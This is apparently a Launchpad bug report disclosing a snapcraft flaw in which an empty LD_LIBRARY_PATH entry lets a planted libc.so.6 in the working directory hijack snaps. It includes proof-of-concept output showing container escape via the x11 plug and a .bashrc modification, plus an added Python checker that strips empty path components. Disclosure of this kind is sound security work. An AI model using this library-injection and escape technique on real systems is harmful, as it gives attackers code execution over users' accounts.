snapd vulnerable to Library Injection from CWD
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
Snapcraft | Fix Released | Critical | Sergio Schvezov |
snapcraft (Ubuntu) | Fix Released | High | Emilia Torino |
Bug Description
I discovered that snapcraft will include the current directory as a search path for LD_LIBRARY_PATH when the home plug is enabled.
This means any snap package with the home plug which is command line can be taken over if the user has a malicious file or directory in their CWD.
This was found when a snap package crashed due to libc.so.6 being in the CWD search path:
itszn@ubuntu:
-rw-rw-r-- 1 itszn itszn 2030544 Oct 25 11:46 tls/libc.so.6
itszn@ubuntu:
Segmentation fault (core dumped)
We can figure out why this is happening by checking strace:
$ sudo strace -f -v -e execve -s 1000 sudo -u itszn vlc 2>&1 | egrep 'LD_LIBRARY_
LD_LIBRARY_
In the above variable, we see a ::; this is the result of an empty env variable being used. This leads to strange behavior in ld where it includes cwd in the search path (which I might also personally consider buggy).
The extra : is probably due to an empty path passed to either https:/
This bug means that any library not provided by the first search paths will be loaded from CWD, including libc.so.6.
A malicious libc.so.6 could be crafted to get code exec within the container when loaded. Additionally this file could
be hidden in a subdirectory named either tls or x86_64.
This code execution can then abuse other plugs, such as the x11 plug, to interact with the rest of the
system and run a script by sending key presses to an open terminal.
I have included a poc which will work with snaps using core-18 with home and x11 plugs. (for example VLC and Chromium)
The impact of this is large as it affects the most installed snaps (based on https:/
POC:
Example running vlc in the POC directory:
-------
itszn@ubuntu:~$ tar xfvz snap-escape.tar.gz
itszn@ubuntu:~$ cd snap-escape
itszn@ubuntu:
total 8
-rw-rw-r-- 1 itszn itszn 0 Oct 25 11:04 amazing-movie.mp4
-rw-rw-r-- 1 itszn itszn 0 Oct 25 11:28 cool-page.html
-rw-rw-r-- 1 itszn itszn 2193 Oct 25 11:45 README.txt
drwxrwxr-x 3 itszn itszn 4096 Oct 25 11:28 tls
itszn@ubuntu:
Got code execution running as itszn inside snap container!
We can read/write any non-hidden (non-dot) file in
+ echo 'Hello from snap code exec' > /home/itszn/pwned
+ cat /home/itszn/pwned
Hello from snap code exec
However we are still restricted by the container
We cannot access dotfiles
+ echo 'echo PWNED' >> /home/itszn/.bashrc
./tls/s: 20: ./tls/s: cannot create /home/itszn/
Or other non-home files
+ cat /etc/issue
cat: /etc/issue: Permission denied
Luckily, this snap has the x11 plug
We can use this escape the container!
Starting container escape...
Escape Success!
We are now running code outside of snap container, we now have full privs of itszn
For example we now can read /etc/issue:
+ cat /etc/issue
Ubuntu 18.04.4 LTS \n \l
Or modify dotfiles
+ echo 'echo PWNED' >> /home/itszn/.bashrc
+ tail -n 1 /home/itszn/.bashrc
echo PWNED
Full escape and code execution~!
-------
Attached is the poc
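The root cause described above is an empty component in a colon-separated search path: the loader treats a leading ':', a trailing ':' or a '::' as the current working directory. The following is an added example (not part of the bug report, and not snapcraft's own code) showing how a wrapper generator or an auditor can detect such components and build the variable without them. The function names, the SAMPLE_ENV dictionary and its LD_LIBRARY_PATH value are constructed for illustration; the real value from the report is truncated on this page.

```python
"""Detect and repair empty components in colon-separated search paths.

An empty component in LD_LIBRARY_PATH (leading ':', trailing ':' or '::')
makes the dynamic loader search the current working directory, so a file
such as libc.so.6 placed there (or under tls/ or x86_64/) can shadow the
real library. PATH has the same rule: an empty component means CWD.
All names below are hypothetical, written for this example.
"""
from __future__ import annotations

# Variables whose empty components imply an implicit CWD search.
CWD_SENSITIVE_VARS = ("LD_LIBRARY_PATH", "PATH")

# Constructed sample environment, modelled on the '::' pattern the report
# describes (not the actual value captured by strace).
SAMPLE_ENV = {
    "PATH": "/usr/local/bin:/usr/bin:/bin",
    "LD_LIBRARY_PATH": "/snap/vlc/current/lib::/snap/vlc/current/usr/lib",
}


def find_empty_components(value: str) -> list[int]:
    """Return the indices of empty components in a colon-separated path.

    An entirely empty variable adds no search directory at all, so it is
    reported as having no dangerous components.
    """
    if not value:
        return []
    return [i for i, comp in enumerate(value.split(":")) if comp == ""]


def sanitize_library_path(value: str) -> str:
    """Drop empty components so the CWD is never searched implicitly."""
    return ":".join(comp for comp in value.split(":") if comp)


def join_library_paths(paths: list[str]) -> str:
    """Build a search path from a list of directories, skipping empty entries.

    This is the join a wrapper generator should use: the naive
    ':'.join(paths) yields '::' whenever one of the entries is empty.
    """
    return ":".join(p for p in paths if p)


def audit_environment(env: dict[str, str]) -> dict[str, list[int]]:
    """Map each CWD-sensitive variable to the indices of its empty components.

    Only variables that actually contain an empty component are returned,
    so an empty result means the environment is clean.
    """
    findings: dict[str, list[int]] = {}
    for name in CWD_SENSITIVE_VARS:
        if name in env:
            empties = find_empty_components(env[name])
            if empties:
                findings[name] = empties
    return findings


if __name__ == "__main__":
    for name, idx in audit_environment(SAMPLE_ENV).items():
        print(f"{name}: empty component(s) at index {idx} -> CWD is searched")
        print(f"  sanitized: {sanitize_library_path(SAMPLE_ENV[name])}")
    print("naive join :", ":".join(["/a", "", "/b"]))
    print("safe join  :", join_library_paths(["/a", "", "/b"]))
```

Run the script directly to see the audit of the constructed environment; the check works for any colon-separated variable with the same CWD semantics, not only the LD_LIBRARY_PATH value in the report.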
CVE References
Changed in snapcraft:
status: New → In Progress
importance: Undecided → Critical
assignee: nobody → Sergio Schvezov (sergiusens)
Additionally here is the script I used to generate the malicious libc.so.6